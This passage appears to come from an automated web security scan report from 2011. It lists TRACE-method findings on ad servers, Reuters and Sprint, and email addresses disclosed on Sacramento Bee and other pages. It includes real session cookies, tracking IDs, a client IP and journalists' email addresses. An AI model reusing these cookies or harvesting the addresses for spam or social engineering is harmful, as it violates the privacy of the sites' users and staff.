20.9. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 88223c8e26499cac

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 88223c8e26499cac; put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi
...[SNIP]...

20.10. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 6612f5336890e8b9

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 6612f5336890e8b9; i=d2a43928-76cd-49ea-b899-b41fb371435f
X-Forwarded-For: 50.23.123.106

20.11. http://rt.legolas-media.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 5c2d70d754ab6c59

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:16 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 5c2d70d754ab6c59; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB

20.12. http://sales.reuters.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.reuters.com
Path:	/

Request

TRACE / HTTP/1.0
Host: sales.reuters.com
Cookie: 130d0eb225d04c5b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sales.reuters.com
Cookie: 130d0eb225d04c5b; tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26dat
...[SNIP]...

20.13. http://tacoda.at.atwola.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: a854573d9f404231

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: a854573d9f404231; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; ATTACID=a3Z0aWQ9MTc
...[SNIP]...

20.14. http://www.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: bdc6f1a797b283a7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:35 GMT
Server: Apache/2.2.14 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: bdc6f1a797b283a7; TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#13150989
...[SNIP]...

20.15. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sprint.net
Cookie: 2f3199ae5bdd5ac1

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Client-IP: 50.23.123.106
Host: www.sprint.net
Cookie: 2f3199ae5bdd5ac1; ServerID=1125

21. Email addresses disclosed previous next
There are 8 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://blogs.sacbee.com/the_state_worker/
http://media.sacbee.com/static/styles/blog_styles.css
http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js
http://www.google.com/uds/Gfeeds
http://www.google.com/uds/Gfeeds
http://www.personalcreations.com/CustomerService-ContactUs.aspx
http://www.sacbee.com/notfound/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

4e62ccf1@cdn.turn.com

Request

Response

21.2. http://blogs.sacbee.com/the_state_worker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.sacbee.com
Path:	/the_state_worker/

Issue detail

The following email addresses were disclosed in the response:

feedback@sacbee.com
jortiz@sacbee.com
webmaster@sacbee.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a href='mailto:jortiz@sacbee.com'>jortiz@sacbee.com</a>
...[SNIP]...
<a href="mailto:webmaster@sacbee.com">
...[SNIP]...

21.3. http://media.sacbee.com/static/styles/blog_styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.sacbee.com
Path:	/static/styles/blog_styles.css

Issue detail

The following email address was disclosed in the response:

mamatteo@sacbee.com

Request

GET /static/styles/blog_styles.css HTTP/1.1
Host: media.sacbee.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=1317445200364%26vn%3D1; s_ppv=100; mi_ppu=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html; s_invisit=true; mi_ppn=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal; mi_pph=3000; mi_pvh=1000; mi_ppl=*Story; s_sq=nmsacramento%3D%2526pid%253DStory%25253A%2525203883102%25257CSprint%252520could%252520be%252520winner%252520in%252520thwarted%252520T-Mobile-AT%252526T%252520deal%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.sacbee.com/the_state_worker/%252523navlink%25253Dnavdrop%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Fri, 06 May 2011 18:20:56 GMT
ETag: "1327514-e11-4dc43c08"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3601
Date: Sun, 04 Sep 2011 00:48:02 GMT
Connection: close

/**
* Blog Styles
*
* Global styles for the MT blogs.
* @author Marc Matteo <mamatteo@sacbee.com>
*/

/**
* @section Main elements
*/
h1 {
/*
   margin-bottom: 8px;
   padding-bottom: 8px;
   border-
...[SNIP]...

21.4. http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.meebocdn.net
Path:	/cim/script/cim_v92_cim_11_12_4.en.js

Issue detail

The following email address was disclosed in the response:

ad-feedback@meebo-inc.com

Request

GET /cim/script/cim_v92_cim_11_12_4.en.js?1313001210 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "932352005"
Last-Modified: Thu, 04 Aug 2011 21:29:39 GMT
Server: lighttpd/1.4.19
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=140427
Expires: Mon, 05 Sep 2011 16:10:51 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 257295
Connection: close

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-291">
...[SNIP]...

21.5. http://www.google.com/uds/Gfeeds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/uds/Gfeeds

Issue detail

The following email address was disclosed in the response:

ldettorre@publicCEO.com

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=0&num=15&hl=en&output=xml&q=http%3A%2F%2Fsacramentoconnect.sacbee.com%2F%3Ffeed%3Dsc%26category_name%3Dpolitics&scoring=h&key=notsupplied&v=1.0&nocache=1315097363266 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

21.6. http://www.google.com/uds/Gfeeds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/uds/Gfeeds

Issue detail

The following email addresses were disclosed in the response:

acruz@sacbee.com
hamezcua@sacbee.com
jvillegas@sacbee.com
pkitagaki@sacbee.com
rbenton@sacbee.com
rbyer@sacbee.com
rpench@sacbee.com
sabeephotos@sacbee.com
u003ecalcala@sacbee.com
u003eclocke@sacbee.com
u003edkasler@sacbee.com
u003edsiders@sacbee.com
u003ehsangree@sacbee.com
u003ejdavidson@sacbee.com
u003elrosenhall@sacbee.com
u003emglover@sacbee.com
u003ephecht@sacbee.com
u003ewmountain@sacbee.com

Request

GET /uds/Gfeeds?callback=google.feeds.Feed.RawCompletion&context=3&num=15&hl=en&output=xml&q=http%3A%2F%2Fwww.sacbee.com%2Ftopstories%2Findex.rss&scoring=h&key=notsupplied&v=1.0&nocache=1315097363269 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 00:48:48 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 52278
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 46411

google.feeds.Feed.RawCompletion('3', {"xmlString":"\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\r\n\u003crss xmlns:dc\u003d\"http://purl.org/dc/elements/1.1/\" xmlns:atom\u003d\"http
...[SNIP]...
gt; This pet python received stitches and lost a couple of ribs after allegedly being bitten by a man. The snake was recovering Friday.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://blogs.sacbee.com/crime/archives/2011/09/python-bit-by-s.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 15:21:46 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 15:21:46 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
from Princeton, CA near Redding, to Sacramento\u0026#39;s Tower Bridge, a distance of approximately 111 miles.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eToday is the second Spare the Air Day this summer, meaning
...[SNIP]...
1. Patrick was attempting to swim from Princeton, CA near Redding, to Sacramento's Tower Bridge, a distance of approximately 111 miles.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882645/like-your-labor-day-weekend-hot.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ewmountain@sacbee.com (Whitney Mountain)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 12:33:35 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 12:33:35 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
e firm keeps in stock at its Gold River facility. The firm specializes in used, recent-model imports.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Ren\u0026#xE9;e C. Byer/rbyer@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eA slice of the Internet's effect on contemporary car selli
...[SNIP]...
some of the more than 100 cars the firm keeps in stock at its Gold River facility. The firm specializes in used, recent-model imports.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003emglover@sacbee.com (Mark Glover)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881518/internet-drives-capital-car-dealer.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003emglover@sacbee.com (Mark Glover)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 11:05:09 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 11:05:09 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
k Austin Perry bursts through a hole during the Falcons' victory over Bradshaw Christian as part of the Smackdown in Sactown showcase. \u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ejdavidson@sacbee.com (Joe Davidson)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882093/preps-fdsfydsfysd-fdysfsdy.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ejdavidson@sacbee.com (Joe Davidson)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 17:18:01 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 17:18:01 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem
...[SNIP]...
e\u003c![CDATA[Dennis Stark of Atlas Tree Service jumps from a grinder at the Putah Creek restoration site.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Paul Kitagaki Jr./pkitagaki@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/53/Uo4ay.St.4.jpg\" height\u003d\"490\" width\u003d\"640\" type\u0
...[SNIP]...
\"\u003e\u003c![CDATA[Rich Marovich and Libby Earthman stand along a section of Putah Creek being restored.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Paul Kitagaki Jr./pkitagaki@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eThere was a time when Putah Creek ran wild near Winters, w
...[SNIP]...
0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Rich Marovich and Libby Earthman stand along a section of Putah Creek being restored.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ehsangree@sacbee.com (Hudson Sangree)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882044/winters-project-restoring-putah.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ehsangree@sacbee.com (Hudson Sangree)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 15:23:32 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 15:23:32 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003cit
...[SNIP]...
artment granted a key victory Friday to a Butte County tribe that has been long frustrated in its effort to build a $150 million casino resort in rural Yuba County.\u003c/description\u003e\u003cauthor\u003ephecht@sacbee.com (Peter Hecht)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881952/tribes-bid-for-yuba-county-casino.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ephecht@sacbee.com (Peter Hecht)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
ates in a downtown Sacramento march against fee hikes and in support of the Dream Act on Monday, Fe. 28, 2011.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Hector Amezcua/hamezcua@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eThe state Assembly voted Friday to send Gov. Jerry Brown a
...[SNIP]...
C Irvine student participates in a downtown Sacramento march against fee hikes and in support of the Dream Act on Monday, Fe. 28, 2011.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003elrosenhall@sacbee.com (Laurel Rosenhall)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881709/lawmakers-send-brown-bill-granting.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003elrosenhall@sacbee.com (Laurel Rosenhall)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 09:40:28 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 09:40:28 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003c
...[SNIP]...
26#39;s 70 positions at a new facility that is opening on Sept. 20 at 10317 Fairway Drive, Roseville.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Ren\u0026#x8E;e C. Byer/rbyer@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eMore payroll tax cuts. A break for manufacturers. Less red
...[SNIP]...
Krispy Kreme held a job fair to fill it's 70 positions at a new facility that is opening on Sept. 20 at 10317 Fairway Drive, Roseville.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003edkasler@sacbee.com (Dale Kasler)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882042/grim-report-sharpens-focus-on.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003edkasler@sacbee.com (Dale Kasler)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
care for his father in his final days. Many of the tools are antiques, bought in flea markets and other spots.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/1dKhKf.St.4.jpg\" height\u003d\"425\" width\u003d\"640\" type\u
...[SNIP]...
u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Ear marker for small animals]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/QPo7D.St.4.jpg\" height\u003d\"425\" width\u003d\"640\" type\u0
...[SNIP]...
u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[A bin full of old hand tools]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003cmedia:content url\u003d\"http://media.sacbee.com/smedia/2011/09/02/21/18/qie75.St.4.jpg\" height\u003d\"700\" width\u003d\"465\" type\u0
...[SNIP]...
270\" width\u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Old loom shuttle]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Randall Benton/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eTo hear his son tell it, Raymond Schneider's garage was ju
...[SNIP]...
i.4.jpg\" height\u003d\"270\" width\u003d\"180\" border\u003d\"0\"/\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;br/\u0026gt; Old loom shuttle\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003ecalcala@sacbee.com (Carlos Alcal\u0026amp;#xE1;)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881950/antique-tool-collection-to-go.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003ecalcala@sacbee.com (Carlos Alcal\u0026amp;#xE1;)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 00:00:00 PDT\u003c/pubDate\u003e\u003c/item\
...[SNIP]...
ts in privacy. To right of Steinberg are UFW President Arturo Rodriguez and Assemblyman Luis Alejo, D-Salinas.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[Hector Amezcua/hamezcua@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eEven before the United Farm Workers union started marching
...[SNIP]...
ll out state-issued ballots in privacy. To right of Steinberg are UFW President Arturo Rodriguez and Assemblyman Luis Alejo, D-Salinas.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003edsiders@sacbee.com (David Siders)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3882041/ufw-jerry-brown-meet-in-the-middle.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003edsiders@sacbee.com (David Siders)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 10:19:07 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 10:19:07 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem
...[SNIP]...
6quot; to redirect the propane into a pond, they had to reignite the blaze to allow it to burn in place again.]]\u003e\u003c/media:description\u003e\u003cmedia:credit\u003e\u003c![CDATA[RANDALL BENTON/rbenton@sacbee.com]]\u003e\u003c/media:credit\u003e\u003c/media:content\u003e\u003csb:credit\u003eThe Sacramento Bee\u003c/sb:credit\u003e\u003cdescription\u003eA calm, take-charge dispatcher, quick action by firefighte
...[SNIP]...
pite plans to use a \"hot tap\" to redirect the propane into a pond, they had to reignite the blaze to allow it to burn in place again.\u0026lt;/blockquote\u0026gt;\u003c/description\u003e\u003cauthor\u003eclocke@sacbee.com (Cathy Locke)\u003c/author\u003e\u003cguid isPermaLink\u003d\"true\"\u003ehttp://www.sacbee.com/2011/09/03/3881949/quick-response-to-lincoln-rail.html#mi_rss\u003dTop%20Stories\u003c/guid\u003e\u003cdc:creator\u003eclocke@sacbee.com (Cathy Locke)\u003c/dc:creator\u003e\u003cdc:date\u003eSat, 03 Sep 2011 14:52:36 PDT\u003c/dc:date\u003e\u003cpubDate\u003eSat, 03 Sep 2011 14:52:36 PDT\u003c/pubDate\u003e\u003c/item\u003e\u003citem\
...[SNIP]...
/media.sacbee.com/smedia/2011/09/02/23/33/16Mm8c.Hi.4.jpg\" height\u003d\"121\" width\u003d\"180\" /\u003e\u003cmedia:description type\u003d\"html\"\u003e\u003c![CDATA[Jos\u0026amp;#xE9; Luis Villegas jvillegas@sacbee.com Highlands quarterback Kurtis Stamm is sacked by defenders from Leland of San Jose in the second quarter of their Battle at the Capital game at Del Oro High School in Loomis. The game was still in prog
...[SNIP]...
